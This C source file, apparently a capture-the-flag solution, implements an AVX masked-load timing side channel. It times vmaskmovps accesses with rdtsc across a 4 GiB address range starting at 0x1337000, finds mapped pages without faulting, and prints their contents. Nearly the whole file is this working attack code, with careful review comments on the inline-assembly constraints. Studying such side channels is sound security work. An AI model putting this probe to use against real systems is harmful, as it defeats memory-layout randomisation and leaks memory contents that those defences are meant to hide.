/* 64-bit unsigned integer used by the raw-syscall wrappers and probe();
 * the file pulls in no headers, so the type is spelled out here. */
typedef unsigned long long u64;
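/*
 * Write one byte to stdout (fd 1) with a raw Linux x86-64 write(2) syscall.
 * Freestanding stand-in for the libc putchar; the signature deliberately
 * differs from the standard int putchar(int).
 *
 * ch: the byte to emit.
 * The syscall's return value (rax) is discarded, so a short or failed
 * write is silently ignored.
 */
void putchar(char ch) {
	__asm__ __volatile__(
		".intel_syntax noprefix\n"
		"mov eax, 1\n"        /* syscall number: write */
		"mov edi, 1\n"        /* fd = stdout */
		"mov rsi, %[buf]\n"   /* buf = &ch */
		"mov rdx, 1\n"        /* count = 1 */
		"syscall\n"
		".att_syntax prefix\n"
		:
		: [buf] "r" (&ch)
		/* "memory": the kernel reads *buf, so the store of ch must be
		 * complete before the asm runs and no access may be moved across
		 * the syscall. Without it the compiler only sees a pointer value
		 * being consumed, not a read through it. rcx/r11 are overwritten
		 * by the syscall instruction itself. */
		: "rax", "rdi", "rsi", "rdx", "rcx", "r11", "memory"
	);
}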
/*
 * Emit a NUL-terminated string followed by a newline, one byte at a time
 * through putchar(). Freestanding stand-in for libc puts (returns void).
 *
 * s: pointer to a NUL-terminated byte string; the terminator is not written.
 */
void puts(char *s) {
	for (char *p = s; *p; p++) {
		putchar(*p);
	}
	putchar('\n');
}
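/*
 * Terminate the process with the Linux x86-64 exit(2) syscall (number 60).
 * Never returns.
 *
 * code: process exit status; it must be in rdi when syscall executes.
 */
void __attribute__((noreturn)) exit(int code) {
	__asm__ __volatile__(
		"mov $60, %%eax\n"   /* syscall number: exit */
		"syscall\n"
		:
		/* "D" pins the operand to rdi, the first syscall argument. A
		 * constraint string of "rdi" is not a register name: it is read
		 * as the alternatives r/d/i, and since the template never
		 * mentions %[code], the status only reached rdi by accident. */
		: [code] "D" (code)
		: "rax", "rcx", "r11", "memory"
	);
	/* The syscall does not return; tell the compiler so the noreturn
	 * attribute is honoured without a "function does return" warning. */
	__builtin_unreachable();
}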
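/*
 * Time a zero-masked AVX load from addr and return the elapsed TSC ticks.
 *
 * vmaskmovps with an all-zero mask loads no element, so the instruction
 * does not fault on an unmapped page; what remains observable is how long
 * the access takes, which main() compares against a fixed threshold. The
 * first masked access is an untimed warm-up; the second is bracketed by
 * mfence/rdtsc pairs.
 *
 * addr: address to touch (a 256-bit masked load, i.e. 32 bytes at addr).
 * Returns: toc - tic in TSC ticks, truncated to int. This is a noisy
 * timing measurement and varies between runs and machines.
 */
int probe(void *addr) {
	u64 tic_hi, tic_lo, toc_hi, toc_lo;
	__asm__ __volatile__(
		".intel_syntax noprefix\n"
		"vpxor ymm0, ymm0, ymm0\n"                        /* mask = 0 */
		"vmaskmovps ymm0, ymm0, ymmword ptr [%[ptr]]\n"   /* warm-up */
		"mfence\n"
		"rdtsc\n"
		"mov %[hi], rdx\n"
		"mov %[lo], rax\n"
		"mfence\n"
		"vmaskmovps ymm0, ymm0, ymmword ptr [%[ptr]]\n"   /* timed access */
		"mfence\n"
		"rdtsc\n"
		"mov %[thi], rdx\n"
		"mov %[tlo], rax\n"
		".att_syntax prefix\n"
		/* "=&r" (early-clobber): hi/lo are written while %[ptr] is still
		 * needed by the second vmaskmovps. With plain "=r" the compiler
		 * may give an output the same register as the input, and the
		 * first mov would then overwrite the address being probed. */
		: [hi] "=&r" (tic_hi),
		  [lo] "=&r" (tic_lo),
		  [thi] "=&r" (toc_hi),
		  [tlo] "=&r" (toc_lo)
		: [ptr] "r" (addr)
		/* "memory": the asm reads through ptr and the measurement must
		 * not have unrelated loads/stores moved into or across it. */
		: "ymm0", "rdx", "rax", "memory"
	);
	/* rdtsc leaves edx:eax zero-extended in rdx/rax; recombine to 64 bits. */
	return (int)(((toc_hi << 32) + toc_lo) - ((tic_hi << 32) + tic_lo));
}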
// we put the main function into the `.entry` section
// and use a custom linker script in order to guarantee
// that main runs first in the flat binary
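/*
 * Entry point of the flat binary. Walks a 4 GiB window of addresses one
 * page at a time, times a masked access to each page with probe(), and
 * prints "FOUND" plus the page's contents as a string when the access is
 * faster than a fixed threshold.
 */
void __attribute__((section(".entry"))) main(void) {
	/* Scan parameters, previously inline magic numbers. fast_ticks is a
	 * calibration value for the machine this was written on: nothing here
	 * derives it, so it will need re-tuning elsewhere. */
	const u64 scan_start = 0x1337000ULL;
	const u64 scan_len = 0x100000000ULL;
	const u64 page = 0x1000ULL;
	const int fast_ticks = 140;

	for (u64 base = scan_start; base < scan_start + scan_len; base += page) {
		/* probe() takes a pointer; passing the u64 directly is an
		 * integer-to-pointer conversion without a cast (a constraint
		 * violation that newer compilers reject). */
		int ticks = probe((void *)base);
		if (ticks < fast_ticks) {
			puts("FOUND");
			/* Prints from base until the first NUL byte; runs past the
			 * page if none is present before the next unmapped one. */
			puts((char *)base);
			putchar('\n');
		}
	}
	/* NOTE(review): as the flat binary's entry point there may be no
	 * caller to return to; exit() above is defined but unused here.
	 * Confirm the linker script provides a return path, else end with
	 * exit(0). */
}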